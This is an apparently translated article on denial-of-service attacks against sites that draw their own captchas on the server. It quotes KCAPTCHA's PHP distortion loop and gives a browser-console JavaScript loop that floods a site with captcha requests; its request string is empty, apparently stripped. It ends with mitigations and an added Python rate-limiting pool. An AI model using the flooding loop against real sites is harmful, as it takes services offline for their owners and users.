DoS attack on sites with their own captcha

You can find a lot of sites that use a captcha to protect themselves from all kinds of unwanted automated activity (bots). In many cases the very same server that hosts the site also generates these captchas. Bolting such a captcha onto a site is very easy, and there are free captcha-generating libraries for it (KCAPTCHA, for example).

What is the danger?

If there is any chance that your site will have enemies (for example, you are the owner of www.piratepay.ru), then by using such a captcha you risk helping them a lot: it becomes very easy to take the site down with even a single client machine.

Why?

Captcha generation is quite resource-intensive, especially when you consider that it is done in PHP (or another language that is not very well suited to image processing).

For example, in the above-mentioned KCAPTCHA the picture is assembled from fragments of a pre-rasterized font, which is itself stored as an image.

There are several such font files (22 in the standard distribution); on each request the directory is scanned and one of the files is chosen at random.

After the randomly selected characters are glued together, the result is distorted. For this, a wave-distortion filter written in PHP + GD2 is used:

/* Wave distortion: for every output pixel, compute a source position displaced
   by two sine waves and sample the source image ($img) around it.
   $rand1..$rand10 are per-request random amplitudes and phases. */
for($x=0;$x<$width;$x++){
  for($y=0;$y<$height;$y++){
    /* source coordinates (floats; GD truncates them to ints on lookup) */
    $sx=$x+(sin($x*$rand1+$rand5)+sin($y*$rand3+$rand6))*$rand9-$width/2+$center+1;
    $sy=$y+(sin($x*$rand2+$rand7)+sin($y*$rand4+$rand8))*$rand10;
    if($sx<0 || $sy<0 || $sx>=$width-1 || $sy>=$height-1){
      continue; /* source point falls outside the image */
    }else{
      /* four GD pixel reads per output pixel for bilinear interpolation */
      $color=imagecolorat($img, $sx, $sy) & 0xFF;
      $color_x=imagecolorat($img, $sx+1, $sy) & 0xFF;
      $color_y=imagecolorat($img, $sx, $sy+1) & 0xFF;
      $color_xy=imagecolorat($img, $sx+1, $sy+1) & 0xFF;
    }
    /* ... */
    /* one more GD call (plus a colour allocation) per output pixel */
    imagesetpixel($img2, $x, $y, imagecolorallocate($img2, $newred, $newgreen, $newblue));
  }
}


That is, all of this happens rather slowly, and no caching is provided by default. The same applies to many other libraries (including the forum ones: phpBB, vBulletin, etc.).

If there are a lot of captcha-generation requests, the server will not have time both to draw captchas and to serve ordinary pages (especially since the site most often runs on some CMS with caching turned off for various reasons).

Attack

In the simplest case it is enough to open the site in your favourite browser (so that the Referer header is correct, just in case), open the JavaScript debugger and type something like this into the console:

cnt = document.getElementById('content'); /* any element with an id */
regen = function() {
  var html = '';
  for (var i = 0; i < 1000; i++) {
    html +=
      ''; 
  }
  cnt.innerHTML = html;
};
window.setInterval(regen, 10 * 1000);
regen();
/* the following is just cosmetics, so that the bottom of the page stays in view */
window.setInterval('window.scrollTo(0, document.body.scrollHeight);', 500);


As a result, we get a multithreaded download of an endless stream of captchas for free (each one generated on the poor server). Clearly not every server can withstand this; many of the servers we tested (with their owners' consent) fell over with HTTP Error 503 Service Unavailable.

Conclusion

There are several obvious ways to prevent this kind of attack:
  • use reCaptcha
  • limit the number of captcha requests from each IP address, from the same session identifier, etc.
  • keep a certain number of pre-generated captchas in a cache (100, 1000, ... depending on the request volume), serve them through something fast (nginx), and rebuild the cache periodically
  • use a reliable text captcha, preferably one that takes the specifics of your site into account (for example, sin(30°) = ...)
  • your own option
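The second and third mitigations above, as an added example in Python rather than the page's own PHP: a pool of pre-generated captchas that is served without any drawing on the request path, plus a fixed-window request counter keyed by IP or session id. `generate`, the client key and the `simulate` scenario are assumptions of this example, not part of KCAPTCHA or the original post; `simulate` replays the single-client flood from the attack section against the pool.

```python
import random, time


class CaptchaPool:
    # Pre-generated captcha pool plus a per-client fixed-window rate limit (added
    # example, not KCAPTCHA code). `generate` is the expensive drawing step and
    # is assumed to return (image_bytes, answer).
    def __init__(self, generate, size=100, limit=20, window=60, clock=None):
        self.generate, self.size = generate, size
        self.limit, self.window = limit, window
        self.clock = clock or time.monotonic
        self.pool = []   # list of (image_bytes, answer)
        self.hits = {}   # client key (IP or session id) -> (window_start, count)

    def rebuild(self):
        # Regenerate all entries from a cron job or background worker, never on the
        # request path. Entries are reused, so rotate the pool periodically.
        self.pool = [self.generate() for _ in range(self.size)]

    def allowed(self, client):
        now = self.clock()
        start, count = self.hits.get(client, (now, 0))
        if now - start >= self.window:   # window expired: reset the counter
            start, count = now, 0
        if count >= self.limit:
            return False
        self.hits[client] = (start, count + 1)
        return True

    def issue(self, client):
        # Returns (image_bytes, answer) for the handler to keep in the session, or
        # None when the client is over the limit (answer with HTTP 429 there).
        if not self.allowed(client):
            return None
        return random.choice(self.pool)  # O(1): no image work per request


def simulate(requests=1000, size=100, limit=20):
    # Constructed scenario: one client fires `requests` captcha loads inside a
    # single window, as the console loop above does. Returns (draws, served, refused).
    draws = [0]

    def fake_generate():
        draws[0] += 1                    # stands in for the expensive draw
        answer = "%04d" % random.randrange(10000)
        return b"png-bytes-" + answer.encode(), answer

    pool = CaptchaPool(fake_generate, size=size, limit=limit, clock=lambda: 0.0)
    pool.rebuild()
    served = sum(pool.issue("10.0.0.1") is not None for _ in range(requests))
    return draws[0], served, requests - served
```

With the defaults, 1000 requests from one client cost exactly 100 draws (the pool build) and only 20 of them are served; the generator is never called from the request path at all.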


P.S. Do not use the "forum" captchas at all, because they are very weak; replace them with reCaptcha. If you use a text captcha, make sure that the number of possible questions is large enough.
